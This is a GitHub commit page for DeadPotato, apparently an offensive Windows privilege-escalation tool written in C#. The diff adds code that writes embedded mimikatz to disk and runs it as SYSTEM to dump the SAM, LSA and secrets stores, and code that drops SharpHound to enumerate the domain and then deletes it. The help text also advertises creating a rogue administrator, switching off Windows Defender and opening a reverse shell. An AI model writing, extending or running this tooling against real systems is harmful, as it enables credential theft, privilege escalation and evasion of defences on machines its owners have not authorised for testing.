Skip to content

Commit

Permalink
Version 1.2:
Browse files Browse the repository at this point in the history 
+ SharpHound enumeration
+ LSA & Secrets Dump
% Fixed banner and minor UI issues
  • Loading branch information
lypd0 committed Aug 4, 2024
1 parent a3f96d8 commit e1a995c
Show file tree
Hide file tree
Showing 7 changed files with 76 additions and 18 deletions.
3 changes: 3 additions & 0 deletions DeadPotato.csproj
View file
Original file line number Diff line number Diff line change
Expand Up @@ -89,5 +89,8 @@
<ItemGroup>
<None Include="Resources\mimikatz.exe" />
</ItemGroup>
<ItemGroup>
<None Include="Resources\SharpHound.exe" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
</Project>
41 changes: 37 additions & 4 deletions Program.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -14,13 +14,15 @@
using System.Linq;
using System.Diagnostics;
using Microsoft.Win32;
using System.Threading;

namespace DeadPotato
{
internal class Program
{
public static bool verbose;
public static bool isInShell;
public static string version = "1.2";

static void Main(string[] args)
{
Expand Down Expand Up @@ -170,11 +172,11 @@ static void Main(string[] args)
break;


case "-mimisam":
case "-mimi":

if (args.Length != 1)
if (args.Length != 2 || (args[1] != "sam" && args[1] != "lsa" && args[1] != "secrets"))
{
UI.printColor($"(<darkred>-</darkred>) This command takes no arguments.\nUsage: <yellow>deadpotato.exe -mimisam</yellow>");
UI.printColor($"(<darkred>-</darkred>) This command takes one of these three arguments: <yellow>sam</yellow>, <yellow>lsa</yellow> or <yellow>secrets</yellow> \nUsage: <yellow>deadpotato.exe -mimi sam</yellow>");
Environment.Exit(0);
}

Expand All @@ -187,7 +189,7 @@ static void Main(string[] args)
{
File.WriteAllBytes(fileName, Properties.Resources.mimikatz);
UI.printColor($"\n(<darkgreen>+</darkgreen>) File written. Attempting to dump SAM...\n\n");
elevateCommand($"{fileName} privilege::debug \"lsadump::sam\" exit", false);
elevateCommand($"{fileName} privilege::debug \"lsadump::{args[1]}\" exit", false);
UI.printColor($"\n(<darkgreen>+</darkgreen>) Removing mimikatz and exiting.");
File.Delete(fileName);
}
Expand Down Expand Up @@ -241,6 +243,37 @@ static void Main(string[] args)
break;


case "-sharphound":

if (args.Length != 1)
{
UI.printColor($"(<darkred>-</darkred>) This command takes no arguments.\nUsage: <yellow>deadpotato.exe -sharphound</yellow>");
Environment.Exit(0);
}

UI.printBanner();

string fileName2 = new string(Enumerable.Range(0, 8).Select(_ => "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"[new Random(Guid.NewGuid().GetHashCode()).Next(62)]).ToArray()) + ".exe";
UI.printColor($"(<darkred>*</darkred>) Attempting to write <darkgray>{fileName2}</darkgray> (SharpHound) in the current directory...");

try
{
File.WriteAllBytes(fileName2, Properties.Resources.SharpHound);
UI.printColor($"\n(<darkgreen>+</darkgreen>) File written. Attempting to run enumeration...\n\n");
elevateCommand($"{fileName2} -c All", false);
UI.printColor($"\n(<darkgreen>+</darkgreen>) Removing SharpHound and exiting.");
Thread.Sleep(1000);
File.Delete(fileName2);
}
catch
{
UI.printColor($"\n(<darkred>-</darkred>) An error occurred. Exiting.");
Environment.Exit(0);
}

break;


default:
UI.printColor($"(<darkred>-</darkred>) Invalid module: \"<yellow>{args[0]}</yellow>\".\nChoose between <yellow>-cmd</yellow>, <yellow>-rev</yellow>, and the following listed in the help page below:");
UI.printHelp();
Expand Down
10 changes: 10 additions & 0 deletions Properties/Resources.Designer.cs
View file

Some generated files are not rendered by default. Learn more about how customized files appear on GitHub.

3 changes: 3 additions & 0 deletions Properties/Resources.resx
View file
Original file line number Diff line number Diff line change
Expand Up @@ -121,4 +121,7 @@
<data name="mimikatz" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\mimikatz.exe;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</data>
<data name="SharpHound" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\SharpHound.exe;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</data>
</root>
Binary file added Resources/SharpHound.exe
View file
Binary file not shown.
2 changes: 1 addition & 1 deletion SharpToken.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -1400,7 +1400,7 @@ public static void createProcessReadOut(TextWriter consoleWriter, IntPtr tokenHa
}
else
{
consoleWriter.WriteLine($"[!] Cannot create process Win32Error:{Marshal.GetLastWin32Error()}");
UI.printColor($"\n(<darkred>-</darkred>) Cannot create process. Win32Error: {Marshal.GetLastWin32Error()}");
}
end:
if (childProcessReadStream != null)
Expand Down
35 changes: 22 additions & 13 deletions UI.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -2,6 +2,7 @@
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
using System.Text.RegularExpressions;
using System.Threading.Tasks;
Expand All @@ -10,6 +11,11 @@ namespace DeadPotato
{
internal class UI
{
static bool IsWindows10()
{
return RuntimeInformation.OSDescription.Contains("Windows 10."); // Very quick, so the banner does not cry over win10
}

public static void printColor(string input)
{
// Define a dictionary to map color names to ConsoleColor
Expand Down Expand Up @@ -82,17 +88,9 @@ public static void printColor(string input)
public static void printHelp()
{
Console.OutputEncoding = Encoding.UTF8;
printBanner();
printColor(@"
⠀⢀⣠⣤⣤⣄⡀⠀ <darkred> _ _ </darkred>
⣴⣿⣿⣿⣿⣿⣿⣦ <darkred>| \ _ _ _||_) _ _|_ _ _|_ _ </darkred>
⣿⣿⣿⣿⣿⣿⣿⣿ <darkred>|_/(/_(_|(_|| (_) |_(_| |_(_)</darkred>
⣇⠈⠉⡿⢿⠉⠁⢸ Open Source @ github.com/<white>lypd0</white>
⠙⠛⢻⣷⣾⡟⠛⠋ -= Version: <green>1.1</green> =-
⠀⠀⠀⠈⠁⠀⠀⠀
_,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,_
(<darkred>*</darkred>) Example Usage(s):
-={ deadpotato.exe -MODULE [ARGUMENTS] }=-
Expand All @@ -102,8 +100,9 @@ public static void printHelp()
-> deadpotato.exe -exe paylod.exe
-> deadpotato.exe -newadmin lypd0:DeadPotatoRocks1
-> deadpotato.exe -shell
-> deadpotato.exe -mimisam
-> deadpotato.exe -mimi sam
-> deadpotato.exe -defender off
-> deadpotato.exe -sharphound
(<darkred>*</darkred>) Available Modules:
Expand All @@ -112,26 +111,36 @@ public static void printHelp()
- exe: Execute a program with NT AUTHORITY\SYSTEM privileges (Does not support interactivity).
- newadmin: Create a new administrator user on the local system.
- shell: Manages to achieve a semi-interactive shell (NOTE: Very bad OpSec!)
- mimisam: Attempts to dump the SAM database with Mimikatz. (NOTE: This will write mimikatz to disk!)
- mimi: Attempts to dump SAM/LSA/SECRETS with Mimikatz. (NOTE: This will write mimikatz to disk!)
- defender: Either enables or disables Windows Defender's real-time protection.
- sharphound: Attempts to collect domain data for BloodHound.
");

}
public static void printBanner()
{
Console.OutputEncoding = Encoding.UTF8;
printColor(@"

if (IsWindows10())
{
printColor($" _.--,_\n .-' '-. <darkred> _ _ </darkred>\n / \\ <darkred>| \\ _ _ _||_) _ _|_ _ _|_ _ </darkred>\n ' _. ' <darkred>|_/(/_(_|(_|| (_) |_(_| |_(_)</darkred>\n \\ \"\"\"\" / ~( Open Source @ github.com/<white>lypd0</white>\n '=,,_ =\\__ ` & -= Version: <green>{Program.version}</green> =-\n \"\" \"\"'; \\\\\\ \n\n\n_,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,_\n\n");
}
else
{
printColor($@"
⠀⢀⣠⣤⣤⣄⡀⠀ <darkred> _ _ </darkred>
⣴⣿⣿⣿⣿⣿⣿⣦ <darkred>| \ _ _ _||_) _ _|_ _ _|_ _ </darkred>
⣿⣿⣿⣿⣿⣿⣿⣿ <darkred>|_/(/_(_|(_|| (_) |_(_| |_(_)</darkred>
⣇⠈⠉⡿⢿⠉⠁⢸ Open Source @ github.com/<white>lypd0</white>
⠙⠛⢻⣷⣾⡟⠛⠋ -= Version: <green>1.1</green> =-
⠙⠛⢻⣷⣾⡟⠛⠋ -= Version: <green>{Program.version}</green> =-
⠀⠀⠀⠈⠁⠀⠀⠀
_,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,_
");
}
}
}
}

0 comments on commit e1a995c

Please sign in to comment.